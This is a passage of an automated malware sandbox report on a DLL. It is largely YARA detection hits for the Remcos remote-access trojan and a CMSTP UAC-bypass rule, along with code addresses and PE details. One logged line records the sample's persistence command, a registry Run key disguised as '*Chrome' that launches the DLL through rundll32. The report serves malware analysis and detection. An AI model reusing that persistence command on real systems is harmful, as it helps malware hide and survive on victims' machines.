              Source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000016.00000002.2595336178.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000014.00000002.2521295751.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: Process Memory Space: loaddll32.exe PID: 7496, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: regsvr32.exe PID: 7556, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: rundll32.exe PID: 7572, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: rundll32.exe PID: 7580, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: rundll32.exe PID: 7644, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: rundll32.exe PID: 7668, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_02B167B4
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,15_2_02A167B4
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B3E2FB12_2_02B3E2FB
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B2739D12_2_02B2739D
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B5332B12_2_02B5332B
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B1F0FA12_2_02B1F0FA
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B3E0CC12_2_02B3E0CC
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B461F012_2_02B461F0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B3816812_2_02B38168
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B5415912_2_02B54159
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B3877012_2_02B38770
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B374E612_2_02B374E6
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B3E55812_2_02B3E558
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B27A4612_2_02B27A46
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B27BAF12_2_02B27BAF
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B1DB6212_2_02B1DB62
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B378FE12_2_02B378FE
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B4D9C912_2_02B4D9C9
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B3394612_2_02B33946
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B3DE9D12_2_02B3DE9D
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B26E0E12_2_02B26E0E
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B35E5E12_2_02B35E5E
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B36FEA12_2_02B36FEA
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B13FCA12_2_02B13FCA
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B37D3312_2_02B37D33
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A3E2FB15_2_02A3E2FB
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A2739D15_2_02A2739D
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A5332B15_2_02A5332B
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A1F0FA15_2_02A1F0FA
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A3E0CC15_2_02A3E0CC
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A461F015_2_02A461F0
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A3816815_2_02A38168
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A5415915_2_02A54159
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A3877015_2_02A38770
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A374E615_2_02A374E6
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A3E55815_2_02A3E558
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A27A4615_2_02A27A46
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A27BAF15_2_02A27BAF
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A1DB6215_2_02A1DB62
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A378FE15_2_02A378FE
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A4D9C915_2_02A4D9C9
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A3394615_2_02A33946
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A3DE9D15_2_02A3DE9D
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A26E0E15_2_02A26E0E
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A35E5E15_2_02A35E5E
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A36FEA15_2_02A36FEA
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A13FCA15_2_02A13FCA
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A37D3315_2_02A37D33
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 02B34E10 appears 54 times
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 02B34770 appears 41 times
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 02B02093 appears 50 times
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 02B01E65 appears 34 times
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 02A02093 appears 50 times
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 02A34E10 appears 54 times
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 02A34770 appears 41 times
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 02A01E65 appears 34 times
              Source: 7P7cuKWTfN.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f
              Source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 6.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 6.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 6.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 22.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 22.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 22.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 22.2.rundll32.exe.4240000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 22.2.rundll32.exe.4240000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 22.2.rundll32.exe.4240000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 6.2.rundll32.exe.5330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 6.2.rundll32.exe.5330000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 6.2.rundll32.exe.5330000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 4.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 4.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 4.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 6.2.rundll32.exe.5330000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 6.2.rundll32.exe.5330000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 6.2.rundll32.exe.5330000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 3.2.regsvr32.exe.5990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 3.2.regsvr32.exe.5990000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 3.2.regsvr32.exe.5990000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 20.2.rundll32.exe.3850000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 20.2.rundll32.exe.3850000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 20.2.rundll32.exe.3850000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 12.2.rundll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 12.2.rundll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.rundll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 20.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 20.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
